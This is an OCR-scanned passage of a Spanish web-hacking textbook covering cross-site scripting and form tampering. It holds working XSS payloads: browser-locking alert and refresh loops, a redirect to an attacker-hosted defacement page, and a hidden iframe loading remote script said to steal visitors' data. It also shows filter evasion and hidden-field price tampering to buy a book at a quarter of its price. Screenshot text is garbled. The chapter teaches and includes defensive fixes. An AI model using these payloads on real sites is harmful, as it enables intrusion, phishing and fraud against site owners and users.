SERVIDOR Y LO DEJAN conciencia de lo que se puede hacer explotando 

la vulnerabilidad de XSS. 

FUERA DE SERVICIO Si una ventana hecha con alert() es fastidiosa, 

varias a la vez lo son mucho más. 

e ÍS Y peor aún es encontrarse un bucle 
interminable de ventanitas en el navegador y que al cerrarlas solo 
logremos que aparezcan otras, hasta que no queda más remedio 
que finalizar el proceso. 


GUSANOS XSS 


En el ámbito de la seguridad informática, un gusano es un virus que se propaga de equipo en equipo sin 
la necesidad de un portador. Existen los gusanos XSS, que buscan modos de propagar las inyecciones 
en JavaScript para ejecutarse de navegador en navegador. Algunas redes sociales han sufrido ataques 


importantes de este tipo de gusanos. 
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El Mundo de la Programacion en tus Manos...! 


Figura 20. Presionando el botón Aceptar solo lograremos 
ver otra ventanita idéntica, y así sucesivamente, 
obligándonos a “matar” el proceso del navegador web. 


Para lograr el efecto, tenemos que introducir en el área de texto 
para los comentarios el siguiente código en JavaScript: 


<script> 

for (;;) 

alert(“No podrás deshacerte de mí”); 
</script> 


En caso de que el navegador bloquee las ventanas generadas 
con alert(), podremos hacer una inyección HTML para que refresque 
el contenido de la página en forma continua, lo cual es también 
sumamente fastidioso e impide seguir usando correctamente el 
navegador. La inyección HTML de la que hablamos es la siguiente: 
<meta http-equiv="”refresh” content="0”>. 

En un XSS persistente, esta inyección se ejecutaría en el navegador 
de todas las personas que visiten la aplicación vulnerable. 

Sin embargo, una vulnerabilidad de este tipo puede ser aprovechada 
de un mejor modo. 
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Redirección a otra web 


Para un hacker malintencionado puede ser de interés redireccionar a 
todos los usuarios que ingresan a un sitio hacia otro lado, evitando que 
accedan a la aplicación real. Como mencionamos en el comienzo de 
este capítulo, el límite de lo posible está en nuestra imaginación. 


Servidor que hospeda 
la página con el código 
inyectado para redireccionar 


paginavulnerable.html 
¡ooo ———o——+ 
paginavulnerable.html 


con código inyectado 
A 


redirección a la web del hacker 


$ 


Usuario 


Servidor que hospeda 
la página del hacker 


Figura 21. Con un breve código en JavaScript podemos 
redireccionar al usuario para donde nosotros queramos. 


En el Capítulo 1 hemos hablado de los defaces, es decir, de 
reemplazar el contenido de una página web por otro (como por 
ejemplo, un mensaje de queja hacia el administrador del sitio). Con una 
inyección en JavaScript podemos redireccionar a los usuarios hacia un 
documento hospedado en cualquier otro lugar, que contenga lo que se 
desea mostrar (mensaje, video, etcétera) en lugar de la web original. 

La inyección de código que realizaremos mediante el área de texto 
para los comentarios es la siguiente: 


<script> 
location.replace(“http://atacante.com/deface.php”); 
</script> 
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Figura 22. En la ventana superior vemos la inyección de código: 
una vez realizada, el usuario será redireccionado ahí mismo 
y verá el deface en lugar de la web original (ventana inferior). 


Si los usuarios ingresaron al sitio que querían visitar a través 
de la dirección URL correspondiente, estarán seguros de que nadie 
robará sus cuentas. 

Pero si el atacante los redirecciona hacia un sitio idéntico al 
original que intentaban acceder, es probable que no lo perciban, 
confíen en la aplicación e introduzcan sus datos de acceso, 
facilitando el robo de sus datos al atacante. 

La inyección que vamos a realizar funciona de la misma manera 
que la anterior, pero con una sintaxis un poco diferente: 
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Alo largo de este capítulo hemos visto diferentes inyecciones programadas en JavaScript. La realidad es 


que podemos crear muchísimas más, como por ejemplo, programar un cuadro de diálogo que le pida al 


usuario su contraseña con la excusa de que ha expirado la sesión. En conclusión, cuanto más se conoce 


JavaScript, mejor se puede explotar esta vulnerabilidad. 
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<script> 
document.location.href = “www.dominio.com/web.php”; 
</script> 
en 
€ 2 oben L] 
Passat 
Comentar 


Figura 23. Al realizar la inyección de código (ventana superior), nos 
redireccionan y vemos una copia exacta de la página original (ventana inferior). 


En las Figuras 22 y 23, se muestra primero la inyección de código 
JavaScript y, debajo, su consecuencia. La redirección se realiza en una 
misma ventana (no se abre una aparte) y solo cambia la dirección URL. 


Inserción de iframes 


La etiqueta <iframe> de HTML permite insertar un documento 
dentro de otro. Por ejemplo, una página web dentro de otra. Para 
aclarar dudas realizaremos una demostración de su uso, con el libro 
de visitas que empleamos en nuestras prácticas. Introduciremos el 
siguiente código en el área de texto para los comentarios: 


<iframe src="http://www.yahoo.com” width=300 height=400> 
<p>Este texto lo verás si tu navegador no soporta iframes</p></iframe> 
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Nombre 


[Ste d 


Comentario: 
<iframe src="http://uw. yahoo.com” | 
puidth=100 he ight-400></1frano» 


| Pasicar rar 


Figura 24. Al ejecutarse la inyección de código anteriormente 
citada se inserta un iframe en la página vulnerable a XSS. 


Algo más interesante de insertar podría ser un documento 
de JavaScript más complejo, que contenga un código útil para el 
atacante. Otro detalle es cambiar los valores de frameborder, width 
y height a cero, para que no se perciba la presencia del iframe en la 
página vulnerable. El código a inyectar en el área de texto para los 
comentarios sería el siguiente: 


<iframe frameborder=0 height=0 width=0 
sre=javascript:void(document.location="http://sitio.com/codigo.js”)></iframe> 
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La cabecera Referer del protocolo HTTP le informa a un sitio desde dónde venimos. Por ejemplo, si 


desde www.google.com ingresamos a www.page.com, la página de Google figurará como referer en 


www.page.com. Si un sitio web imprime este dato, podemos reemplazar el contenido de la cabecera 


por una inyección en JavaScript. 
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Una opción más breve es: 


<iframe src="http://sitio.com/codigo.js” width=0 height=0 
frameborder=0><iframe> 


En este caso, hemos insertado el archivo codigo.js, que contiene 
el script que queremos ejecutar en el navegador sin que los usuarios lo 
puedan advertir. Tal script podría ser, por ejemplo, un código que 
obtenga todo su historial de navegación. En la Figura 25 podemos 
observar cómo quedaría nuestro comentario con la inserción del iframe. 


[She l 


iframe sro="http://.sitio.com 
Vcod1go.j5” trameborder-Y wicth=0 
beisht-03</1frame> < Auncue_ nc. 


| Publicar cameraro 


Comentario enviado por Shei: 
«-—— Aunque no lo veas aquí hay un iframe que robara tus datos! :) 


Figura 25. Podemos utilizar iframes para ejecutar códigos JavaScript 
en el navegador web del usuario sin levantar sospechas. 


Evasión de filtros 


Un filtro de agua se encargaría de quitar todo lo que en ella 
esté de más, de modo que al consumidor le llegue limpia. En la 
programación, un filtro se encarga de evitar la ejecución de los 
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caracteres propios de una inyección: < y >, ( y ), ;, / (y algunos otros 
más). Podemos encontrar muchos filtros en la web, pero existen 
también numerosas técnicas de evasión. 


A! 


Hola ¡No se permiten inyecciones JavaScript! ;), 
e 


Estas usando el navegador web Firefox 11. 
Tu sistema operativo es Windows 7 
Y tu dirección IP: 190.68.105.33 


Figura 26. En la web podemos encontrar 
muchos filtros que evitarán la ejecución 
de inyecciones de código cuando lo intentemos. 


Prueba y error 


Un filtro programado en JavaScript facilita mucho la tarea de 
evadirlo, ya que puede ser visto tan solo con mirar el código fuente 
de la página. En caso de estar creado en PHP ni siquiera se puede 
ver cómo está programado, dado que este lenguaje se ejecuta del 


S-SITE SCRIPTING 


DOM XSS es un ataque poco común y algo complicado. La diferencia con los demás Cross-Site Scripting 
está en que la inyección se ejecuta en el navegador del usuario a través de la URL, pero no se incluye en 
el código fuente de la página. Por ejemplo, si el usuario tiene una página web personal, será útil ya que 
permite ejecutar código en su navegador usando sus permisos. 
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lado del servidor, situación en la cual solo queda intentar evadirlo a 
prueba y error. Supongamos que queremos inyectar un simple alert 
(<script>alert(*XSS”);</script>) pero nos encontramos frente a un filtro 
que evita el uso de la etiqueta <script>, impidiéndonos por lo tanto 
realizar inyecciones en JavaScript. Imaginemos que el código del filtro 
es similar al siguiente: 


<?php 

$user = $_GETL'user”); 

$user_filtro = str_replace(“<script>" /*” $user); 
2> 


La función str_replace() de PHP sirve para remplazar determinados 
caracteres (parámetro uno), por otros caracteres (parámetro dos), 
dentro de una cadena de texto (parámetro tres). En este caso, se 
examinará el contenido de la variable user en busca de los caracteres 

<script> y no se los reemplazará, ya que el 
segundo parámetro está vacío (*”); como 


MUCHOS FILTROS consecuencia, se elimina la etiqueta <script>. 

ANTI-XSS Cuando intentemos realizar nuestra inyección, 
solo lograremos 

UTILIZAN que se imprima como texto plano el código 

LA FUNCIÓN PHP JavaScript sin sus etiquetas. Es decir, 
visualizaremos en pantalla únicamente el texto 

STR_REPLACE() (por ejemplo, alert(*XSS”)), sin que se ejecute la 


inyección. ¿Cómo evadirlo, entonces? 

Podemos intentar escribiendo la etiqueta en 
mayúscula (<SCRIPT>) o alternando (<ScRIpT>), ya que la función 
str_replace() es sensible a mayúsculas y minúsculas. En el ejemplo 
del filtro que analizamos, únicamente se está filtrando la etiqueta 
<script> en minúscula. 

Es probable que se utilicen filtros más complejos, quizás haciendo 
uso de un array() con las etiquetas HTML permitidas (por ejemplo, en 
un libro de visitas). Aun así, desde el punto de vista de la seguridad 
debemos tener mucho cuidado al usar funciones como str_replace() y 
similares para la creación de filtros, ya que podrían ser evadidos. 


en 
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Figura 27. Alternar entre mayúsculas y minúsculas puede ser una buena 
opción para saltar filtros que utilicen str_replace(). 


Una opción que ayuda a crear un filtro más seguro es strip_tags(). 
Según la guía de www.php.net, esta función elimina las etiquetas HTML 
y PHP de la cadena de texto que recibe como parámetro. En la práctica, el 
filtro programado correctamente quedaría de la siguiente manera: 


<?php 

$user = $ GETTl'user”J; 
$user_filtro = strip_tags($user); 
2> 


eee 
ma RESUMEN 


El Cross-Site Scripting ocupa actualmente el tercer puesto en el top ten de vulnerabilidades OWASP. 
Alo largo de este capítulo, aprendimos el funcionamiento de la técnica y el peligro que envuelve. Trata- 
mos dos tipos de Cross-Site Scripting, persistente y reflejado, y realizamos prácticas con diversas apli- 
caciones e inyecciones en JavaScript. Aprendimos a obtener credenciales de acceso de otros usuarios 
y a denegar el uso de un navegador web, entre otras acciones. Por último, analizamos los distintos tipos 
de filtros que se pueden presentar y cómo crear una aplicación segura. 
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Actividades 


TEST DE AUTOEVALUACIÓN 


¿Cómo funciona la técnica de Cross-Site Scripting? 

¿Por qué decimos que JavaScript “está de nuestro lado”? 

¿Qué debemos encontrar para llevar a cabo un XSS? 

¿Qué se puede lograr explotando esta vulnerabilidad? 

¿Cuál es la diferencia entre Cross-Site Scripting persistente y reflejado? 
¿Por qué es interesante para un atacante obtener la cookie de un usuario? 


¿Qué significa realizar un ataque DoS al navegador? 


0 Of 0d bh Y N FP 


¿Cómo puede un atacante redireccionar a los usuarios hacia otro sitio con una 
inyección en JavaScript? 


lo] 


¿Cómo podemos saltar los filtros que encontramos en la web? 


EJERCICIOS PRÁCTICOS 


Programe una aplicación vulnerable a Cross-Site Scripting. 
Realice una inyección JavaScript para obtener cookies ajenas. 
Realice un ataque de denegación de servicio a su navegador web. 


Evada un filtro de datos que utilice la función str_replace(). 


1 
2 
3 
4 
5 


rs PROFESOR EN LÍNEA 


Programe una aplicación segura contra Cross-Site Scripting. 


Si tiene alguna consulta técnica relacionada con el contenido, puede contactarse 
con nuestros expertos: profesorOredusers.com 
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Del cliente al servidor 


La mayoría de los sitios web hacen uso de formularios a 

la hora de solicitar información al cliente. Puede resultar 
útil modificarlos, ver sus campos ocultos, eliminar límites 

y demás. Aprenderemos a manejar herramientas que nos 
ayudarán a manipular formularios y modificar los datos que 
van del cliente al servidor. También hablaremos sobre el 


envenenamiento de cookies y otros ataques de este tipo. 


v Manipulación 7 OSI O Mas naa za tanaos tas na oocacaos al 165 SS 


de formulariOS......occmnmommmmmmmm.. 146 
w ActividadesS......ooconnnmmommmom”*m.s» 166 


v Interceptar datOS......ccccccon.m. 156 


w Envenenamiento de cookies.. 160 
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Manipulación de formularios 


Formularios de contacto, suscripción, registro, acceso, búsqueda, 
preguntas, compra y muchísimo más: están prácticamente en todos 
lados. Es muy común que las aplicaciones web soliciten información a 
sus visitantes y los formularios son el medio que utilizan para lograrlo. 

Analicemos lo siguiente: un formulario de búsqueda quizás sea 
vulnerable a una inyección XSS, pero podría darse el caso de que 
el campo de texto permita insertar tan solo diez caracteres. En una 
inyección JavaScript, diez caracteres no alcanzan para modificar el 
comportamiento de la página; sin embargo, el límite se puede eliminar. 


jes" QU Information" a Miscellaneous 4 Outinw Y besoo XK Too" UE Ver Sowce A Options" 


BUSCADOR <a, 


<scriptral 


Figura 1. Un campo de texto puede poseer una limitación 
que impida escribir más de una determinada cantidad de caracteres, 
lo que podría dificultar una inyección. 


En un formulario de compra, por ejemplo, puede que el precio del 
producto que vamos a adquirir se encuentre en un campo que a simple 
vista no podemos ver. Sin embargo, existen técnicas para visualizar los 
campos ocultos e incluso modificarlos. 

En definitiva, un hacker puede manipular los formularios que 

haya dentro de un sitio web, modificando cada componente a su 
conveniencia, eliminando límites, leyendo y editando campos ocultos, 
entre otras acciones. A lo largo de este capítulo, analizaremos varias 
técnicas de ataque que pueden ser llevadas a cabo del lado del cliente. 
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Web Developer 


Web Developer es un excelente complemento para Firefox y 
lo utilizaremos en las próximas secciones. Podemos obtenerlo en la 
página addons.mozilla.org y, una vez instalado, veremos que se 
nos añade una barra con múltiples menús que contienen interesantes 
herramientas y opciones. 

Se trata de un complemento ideal para desarrolladores web, ya que 
permite obtener información de todos los componentes de la página 
(imágenes, estilos CSS, cookies, enlaces, documentos, tablas, etcétera). 

En adelante nos enfocaremos en el menú Forms. 


e ego ome pu E | 
ts - e a 
O tacto de ima Y 000 Gi ll toga Y A A 


e Web Developer 
pa 


Tie Vet Dela? ccleaner alo ns o dr eee Dada 0 De rr 


Figura 2. Web Developer es un excelente add-on para Firefox y, 
al instalarlo, añade una barra con herramientas de mucha utilidad. 


Detalles del formulario 


El ítem Display Form Details del menú Forms sirve para visualizar 
los detalles del formulario. Al seleccionar esta opción, aparecerán 
recuadros al costado de los componentes del formulario que mostrarán 
el código HTML de cada uno. Por ejemplo, de un campo de texto 
obtendremos identificador, nombre y cantidad máxima de caracteres 
permitidos. Lo mismo ocurre con el resto de componentes (ya se trate 
de botones, área de texto, listas, casillas, etcétera). 

Con respecto al formulario en sí, veremos la propiedad action que, 
como su nombre indica, es la acción que se realiza al enviar los datos. 
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Por ejemplo, en el caso de una suscripción, podríamos ver algo similar 
a lo siguiente: action="suscribirse.php” (este archivo se encargará de 
almacenar nuestro correo electrónico). 

MD ros acreóraca  comtacro 4 


€ 8 tocóra : a 
O pur de coser Y Ct [] tomo” El image Y rémmacs” Y ita Y tn Y Maca A nato: UE e hair A Opinar 


Pug en contacts CTS 


Póngmsa en contacto con novatros a través del (ormáario vtuedo a la 
derecha a vivitenes en muestras oficinas 


En ae 


Figura 3. Mediante este add-on podemos 
ver el código de cada componente del formulario. 


Existe también otra opción para ver información sobre los 
formularios, View Form Information. La diferencia con el ítem anterior 
radica en que, en este caso, se abre una pestaña en el navegador que 
muestra de manera organizada los detalles de cada formulario. 


Contraseñas al descubierto 


Cuando una aplicación web con formulario de ingreso solicita nuestra 
contraseña, al momento de introducirla vemos asteriscos o puntos en 


"444 


LENGUAJES DEL LADO DEL SERVIDOR 


Así como hay lenguajes de programación que se ejecutan del lado del cliente, también están los que se 


interpretan en el servidor web. Algunos de los más conocidos son PHP, PERL, ASP, JSP. Es importante 
saber que los filtros y/o sistemas de seguridad serán mucho más efectivos si los programamos en tec- 
nologías que se ejecuten del lado del servidor. 
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lugar de los caracteres que realmente escribimos. El ítem Display 
Passwords del menú Forms sirve para quitar esa seguridad, de modo que 
veamos los caracteres escritos como si fuera un campo de texto normal. 


E rmrvernts serte e e les 

ts Poca a 
O vuár de Cater Y TD [] tuno Ue inayor items Y tarta Y Di Y deci Ka UE e dr Da 

Y ¿Ae due 


Regístrate 


) 


de tu vida. 
1 
AS A 
4 
”z 
x 2 n 


Figura 4. Haciendo uso del ítem Display Passwords podremos 
visualizar la contraseña escrita en lugar de los asteriscos. 


GET a POST y POST a GET 


Cuando un formulario envía los datos al 
servidor, puede hacerlo a través del método 


POST (“invisible” al usuario) o mediante GET, WEB DEVELOPER 

que permite ver todo lo que se envía en la CONVIERTE LOS 

barra de direcciones. Web Developer brinda la , , 

posibilidad de convertir los métodos de envío METODOS DE ENVIO 

de información, de GET a POST y de POST a GET. DE INFORMACIÓN 
Para aclarar las dudas que puedan surgir al 

respecto, aplicaremos esta herramienta sobre AL SERVIDOR 

un formulario de contacto que utiliza el método 

POST. Por lo tanto, al presionar el botón Enviar > y 

no notaremos cambio alguno, ni en la aplicación ni en la barra de 


direcciones. Deberemos convertir el método de POST a GET mediante 
el uso del ítem Convert Form Methods del menú Forms. Luego, al 
presionar el botón Enviar, notaremos cómo cambia la dirección URL, 
mostrando todos los datos enviados. 
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Contacto L4 
e localice . s s . . pa he 4 - B- 
A AAA A AAA AA 


1 term comentes to a qe. 


FORMULARIO DE CONTACTO 


Nombre: 
[Sheila Ayelen 


PS 
l767-7146 


Correo electronico E 
[hey 7Bgnail.con | 


¿Administra una empresa?: 51 + No 


paca 


Hola!! Este es mí mensaje.... 


Saludos 
Lt e) 
Figura 5. Podemos convertir el método de POST a GET 
para que sean visibles los datos enviados en la barra de direcciones. 


Convertir los métodos de envío de datos a GET simplifica la tarea 
de buscar y explotar vulnerabilidades manualmente. 


Activar campos deshabilitados 


Puede que nos hayamos encontrado con formularios que 
poseen campos deshabilitados, en los cuales no podemos escribir 
ni modificar valores, y que comúnmente se habilitan al seleccionar 
alguna opción o tildar una casilla. Con Web Developer podemos 
activar todos estos campos tan solo presionando el ítem Enable 
Form Fields, del menú Forms. 


"4474 
FORM TAMPERING 


La manipulación de formularios es una técnica conocida como Form Tampering. Si queremos apren- 


der más acerca de esta técnica y conocer otras herramientas relacionadas que sean útiles, podemos 
encontrar en internet un sinfín de información en páginas web y documentos. Sólo es necesario abrir un 


buscador y realizar una búsqueda bajo el título de Form Tampering. 
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Contacto 15, 


€ AS sb . Mn . 4 pr pl ' a- 
O Ouatie” de Cocinar Y 03% LI Formar UE images” Y istomañen: [] Macelaranas: Y Cito: Y Marce K Toei UE Vian Som” A; Option 
Ó 1 tomtes enmbied. 


FORMULARIO DE CONTACTO 


Mombre: 
[Sheila Ayelen 


Apellido: 
[Berta 

Telefono: 
(4767 71,46 


Correo electronico: 
(shey .«PBgnail.com 


¿Administra una empresa?: Si + No 


Mombre de tu empresa 


Pio tengo pero te habilite! 


Mensaje: 
(El campo enpresa ha sido habilitado mediante Web 
¡Developer . 


(mia monja ) 


Figura 6. Mediante la opción Enable Form Fields del menú Forms, 
activamos el campo Empresa (aunque no tengamos una). 


Campos hidden: ¿realmente ocultos? 


Los sistemas de compra y venta ocupan una buena parte de 
internet. Las aplicaciones utilizadas actualmente en el comercio 
electrónico son modernas y dinámicas, ya que utilizan el lenguaje 
PHP para conectar a bases de datos que contienen la información 
sobre el producto en venta. 

Si bien en todas las aplicaciones de este tipo podemos encontrar 
diversas fallas de seguridad, en este caso trataremos una en particular, 
que afecta a los sistemas simples programados en HTML/JavaScript que 
encontramos en blogs o sitios web pequeños. 


D COMPLEMENTOS PARA FIREFOX 


Tamper Data y Live HTTP Headers capturan el tráfico HTTP permitiéndonos ver y modificar las cabe- 
ceras que envía nuestro navegador. Además, podemos editar el contenido que las aplicaciones mandan 
al servidor por método POST. Son complementos indispensables para saltar filtros y/o sistemas de 


seguridad programados en tecnologías del lado del cliente. 


www.detodoprogramacion.com www.redusers.com <« 


152 (MES 5. DEL CLIENTE AL SERVIDOR 


$ A min 


Q Dude de ¡car Y Cl Ge dl ima Y omar E catre Y Catia Y her A aatr ME a rr E Con 


Libro: Mackor: de la «eb | Precio: 095 40 
) 


Jele<cione el medio de pago 
(Seleccione un uedio de pagojy) 


| Comprar | 


Figura 7. Un sencillo formulario de compra 
de productos puede ser manipulado fácilmente. 


En la Figura 7 podemos ver un formulario para realizar una 
compra, en el que debemos completar los datos indicados para 
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7 Compre de Urea ES 
$ 3 oct at » c m- 
O Ondirr di Cocer Y 055 [] Fe Gl image UY intcmaen- El Miscellaranas* Y Cutter Y Mic A Tocter ME Vie Scrrre ($ Option 


FORMULARIO DE COMPRA 


Libro: Mackers de la web | Precio: US$ 40 


ASA ATT 
Mombre. 


Seleccione el medio de pago: 


CARA (Seleccione un medio de pago +) 


Figura 8. El ítem Display Form Details también 
permitirá ver los campos ocultos que posea el formulario. 


Una vez que accedemos al campo oculto, podemos modificar su 
contenido a nuestra conveniencia. Lo que haremos, como ejemplo, es 
cambiar el precio del libro por uno menor: U$S10 en lugar de U$S40. 
También podemos convertir el método de envío de datos a GET, de 
modo que el precio aparezca en la dirección URL y podamos cambiarlo 
desde ahí. Hecho esto, cuando presionemos el botón Comprar veremos 
en la URL el nuevo precio junto a los demás datos ingresados. 

De este modo, manipular un formulario de compra resulta rápido 
y fácil. Tengamos en cuenta que este fue solo un ejemplo. Los campos 
ocultos se pueden encontrar en cualquier tipo de formularios y si no 
los podemos ver se —.. ús 
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Compra de loros Le 
$ 5 loomor ¡ ' , $ » A 4 , > B- 
O Dust" dee Coster: Y 055 LI Fama” limar: UY informaron El hiecelleneman: 4 Cutie Y Manic A Tears ME Vie dur A Option 


FORMULARIO DE COMPRA 


Libro: Mackers de la web | Precio: U$S 40 


AA (ls o 
Apellido: 
IR ) 
Telefono: 


Direccion: 


A A ) 


Seleccione el medio de pago: 


¡Seleccione un medio de pag =) 


ATT | Camper 
= | 


Figura 9. Modificamos el contenido del campo oculto 
y compramos el libro a USS10, en lugar de USS40. 


Si somos administradores de un sitio web que posee una aplicación 
similar a la analizada, deberíamos contar con conocimientos de PHP y 
bases de datos para armar un sistema más seguro o buscar aplicaciones 
para comercio electrónico ya programadas. 


Eliminar el límite 


Ya sabemos que, según la aplicación, un campo de texto puede 
ser usado para inyectar código HTML/JavaScript en la página. Las 
inyecciones que programamos suelen tener una buena longitud (por 
ejemplo, un código para obtener las cookies posee alrededor de 90 
caracteres), por lo cual el administrador del sitio quizás vea como una 


"444 


Dd FIREBUG 


Un complemento para Firefox muy interesante es Firebug, que al igual que Web Developer es útil para 
los desarrolladores web. Permite editar todo el código fuente de la página (incluidos los formularios), 
tiene una interfaz agradable y es fácil de usar. En resumen, se trata de una alternativa a Web Developer. 
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medida de seguridad poner un límite en los campos de texto, mediante 
la propiedad maxlength (por ejemplo, si el valor de dicha propiedad es 
25, podemos escribir como máximo 25 caracteres). 


La + 
€ 4 om. 12] 


Q ua de ¿Y E me rr Y mk E aer Y e Y ar Ar ir dm 


BUSCADOR a, 


TI <scriptralert(“UFA" );4 


Figura 10. Un campo de texto puede poseer un límite de caracteres, 
con el objetivo de que no podamos escribir la inyección completa. 


En los formularios un límite puede ser eliminado fácilmente, por lo 
que aplicarlos no sirve de mucho. El ítem Remove Maximum Lengths del 
menú Forms da la posibilidad de eliminar la restricción de caracteres. 


Puse mo le 


$ ¿una o 
AAA A AAA 
a a 


BUSCADOR -., 
A A A A a o o] 


Boro e +] <criptr alert ("Ahora si ');</script> 


Figura 11. Podemos eliminar fácilmente un límite 
de caracteres con la herramienta Web Developer. 
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Manipular los formularios es muy fácil y los resultados pueden ser 
bastante útiles e interesantes para un atacante, aunque dañinos para 
el administrador de la página, el usuario y/o la persona que vende 
un producto mediante una aplicación mal programada como las que 
hemos visto. Para evitar esta serie de problemas, es importante utilizar 
tecnologías que se ejecuten del lado del servidor, y así validar los datos 
ingresados por los usuarios. 


 Interceptar datos 


Cuando alguien es utilizado como medio para llevar 
información de una persona a otra, se corre el riesgo de que sea 
total o parcialmente modificada por quien la porta. En esta sección, 
interpretaremos ese rol y estaremos ubicados en medio de la 
conexión entre nuestro navegador y el servidor web, interceptando 
y modificando los datos que se envían. 


Google <= 
o 
S 
Navegador web Servidor 


Figura 12. Un hacker puede obstruir los datos que 
se envían y modificarlos antes de que lleguen al servidor. 


Quizás nos estemos preguntando qué sentido tiene interceptar 
nuestra propia comunicación para modificar los datos que nosotros 
mismos enviamos al servidor, siendo más práctico editar directamente 
desde el navegador. 

Si bien el cuestionamiento es lógico, mirando simplemente la 
pantalla no estamos al tanto de todo lo que ocurre. Solo al interceptar 
la comunicación podemos conocer todas las consultas que realiza 
nuestro navegador al servidor web cuando descargamos, ejecutamos 
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y utilizamos una aplicación. Puede que las peticiones contengan 
datos de interés, por lo cual es útil ver el contenido de cada una 
y modificarlo a nuestra conveniencia. 


Tamper Data 


Para concretar esta mediación necesitamos una herramienta que 
ingrese en la conexión: Tamper Data, un complemento para Firefox 
que podemos descargar e instalar como cualquier otro add-on (una vez 
instalado, veremos el ítem Tamper Data en el menú de herramientas de 
Firefox). Este interesante complemento permite ver y modificar las 
cabeceras HTTP que le envía nuestro navegador al servidor web, 
otorgándonos la posibilidad de modificar cualquier dato que envíe 
la aplicación que estemos usando. 


=== Dato 
-——————— o) Dato modificado 
Coogle —_— e pi 
Navegador web Respuesta Servidor 


Figura 13. Tamper Data es un add-on para Firefox 
que permite ver y modificar las cabeceras HTTP. 


Cuando iniciamos la herramienta, vemos una 
ventana dividida en tres partes. En la sección de 


arriba aparecen todas las peticiones que vaya TAMPER DATA PUEDE 
realizando el navegador. VER Y MODIFICAR LAS 
Al seleccionar alguna de estas peticiones, 
en la parte inferior izquierda visualizaremos CABECERAS HTTP 
las cabeceras de la consulta y en la derecha la QUE ENVÍA NUESTRO 
respuesta obtenida. 
El simple hecho de ver todas las peticiones NAVEGADOR 
que realiza el navegador mientras utilizamos 
una aplicación web puede ser de gran ayuda » > 
para encontrar alguna falla de seguridad que posea. 
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O amooo siguentes perriones “SIÉ5 E 
Comenzar modificación Pia mod”iacón Limpiar Opciones Ayuda 
Fltro Vertado 
Hore Duración — Durscióntotal  Temeño Método Estado  Tipodecorterido URL  Mercadores cargados al 
18430... 218 eu 1012 ms 118 yl 200 tast/htmi http... VALIDATE ALWAYS LO... * 
18130... M2 ms 1Q ms 1 Ger zos application/sumár... hitos... LOAD ONLY JE MMODI... | 
18130... 204 mus 204 ma 1 GET o sophcaton/rumár... Mtg). LOAD ONLY IF MODI.. | 
181530. 364 ms JH ma 1 13 mM application. htip/. LOAD NORMAL 
16131. DS mm TS 1 10Y 0 epocas Http). LOAD MORMAL E 
10:12... 198 me 198 ma o ar 20 ea. peras... VALIDATE_ALWAYS 
16131... 207 ma 207 ma 1 ar 204 apchcstion/r unir... Pep. LOAD ONLY JE_MOD!.. 
10131... 0 ma 0m unimos CET perdio rironn perpo/... LOAD NORMAL 
181131..0 m4 0 mn unimos GET perdia urna pergos... LOAD NORMAL 
18U34... 198 me 1634 ms 173 Ger y tognemi mrp/... LOAD_DOCUMENT_ UR... 
18434... 207 ms 207 me on cer 200 reja yl httga/... LOAD MORMAL 
18131.. 90 mus $00 má vu a 2 me e pita)... LOAD MORMAL 
16132... 9/2 9 mr su) ae na ma e httoJ.. LOAD MORMAL 
16431. Mim 103 rra 1067 an o rrege poz http / 1040 MORMAL he 

Nombre de cabecera pe. Valor de cabecera pedido | | Mere de cabrera secta ados de cabecera recioicda 
Host o a | ene OK - 200 
User Agent Modila/3.) (Windows NT EJ: 0. | | Date Sun, 14 Aug 2011 21:13:11 GMT 
Aciospt bat html spp ation/ahtmis ae a | Expira 1 
Accept-Lar guage es-e es. 3-04 ma q-0)eqr03 Cache-Contral pr de mar age? 
Accept-Encoding ¿ap dellate | Content-Type test htrmk chart U TES 
Accept-Charset 150 -£859-1 utl-8:4-0.7,",9-0.7 'Contert-iocodng q 
Connechon AS er qee 
Retenes Pep wan google com se, CC amtert Lencth 11725 
' Cooke A e da! | 1-15, Protechon 1, modesbiock 
| 
| 


Figura 14. En la parte superior de la ventana vemos 
todas las peticiones que realiza el navegador; al seleccionar 
una, podemos ver sus cabeceras en la división inferior. 


Si se trata de formularios, podemos hacer todo lo que aprendimos en 
la sección anterior y más. Supongamos que la aplicación de compra de 
libros que vimos anteriormente contenga un código con tecnología client- 
side que, antes de enviar el formulario completo al servidor, revise que el 
precio del libro no se haya modificado y efectivamente sea de U$S40. 

Si fuera así, la técnica que aprendimos no funcionaría, volviendo 
indispensable el uso de Tamper Data. Para hacerlo, debemos 
completar todos los datos que solicite el formulario pero, antes de 
enviarlo, abrir el add-on y apretar el botón Comenzar modificación 
(ubicado en la esquina superior izquierda). A partir de allí, cada vez 
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JUEGOS EN PELIGRO 


Por si fuera poco, Tamper Data también es usado para el hack de minijuegos online. Por ejemplo, cuando 


perdemos, la aplicación envía al servidor nuestro puntaje. Si lo interceptamos con Tamper Data podemos 
modificarlo y elevarnos la cantidad de puntos. En internet hay bastantes tutoriales y videos sobre el hack 
de juegos con este add-on. 
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que el navegador envíe información aparecerá una pequeña ventana 
que nos preguntará si queremos modificar o enviar los datos. 
En nuestro ejemplo, los modificaremos. 

WO nos Dat: - Sgrentes parcone a TE 


Comenzer modiicacón Pre rosñcaco: Lampir Opciones Ayude 


A 


Hor Duración — Dunacéntaa Tamaño Ménds —imaós Tipo decartemnido UB Marcadores cargados NM 
[LADA 379 ros 13m 545 POST Pl applicitor ed qe htap/ LOAD BYPASS CACHE 
Ventana Tampa SS 


Mtro A compra ph 


Miorriora de cabecics pebds 1 da rs próda Morriaa de perrera pont Ve de pere pont 
Host AS | he a 

User Aguera Masia 20 Miaders NTEL | Membos “ara 

ao tra dev opc em | aprit dera 

e ER TAS Sn or mues 
Aro y ise terr. LAA 

accepa Chamet 50-149 1 sq .27 0-9 mea wey ma corr 


Conmecuon hee dee er” eL CO e mando de 


| 
hice rg ochos: : orga | ems e 


Figura 15. Al hacer clic en el botón Modificar se abre una ventana con 
las cabeceras HTTP y los datos que se están enviando por el método POST. 


Tal como observamos en la Figura 15, del lado derecho el primer 
valor que aparece es del campo Precio. Para cambiarlo, simplemente 
reemplazamos su contenido como si viéramos 
un campo de texto común en la página web, y 


luego presionamos Aceptar para que se envíen al TAMPER DATA 

servidor los datos modificados. De este modo, SIRVE PARA EVADIR 

estamos burlando la verificación del lado del 

cliente que posee la aplicación. PROTECCIONES 
Queda demostrado una vez más lo poco útil DEL LADO 

que es programar filtros y verificaciones de 

seguridad en estas tecnologías. La solución es DEL CLIENTE 

utilizar lenguajes como PHP o ASP para validar los 

datos una vez que llegaron al servidor. > y 
Interceptar comunicaciones y modificar a gusto los datos que se 


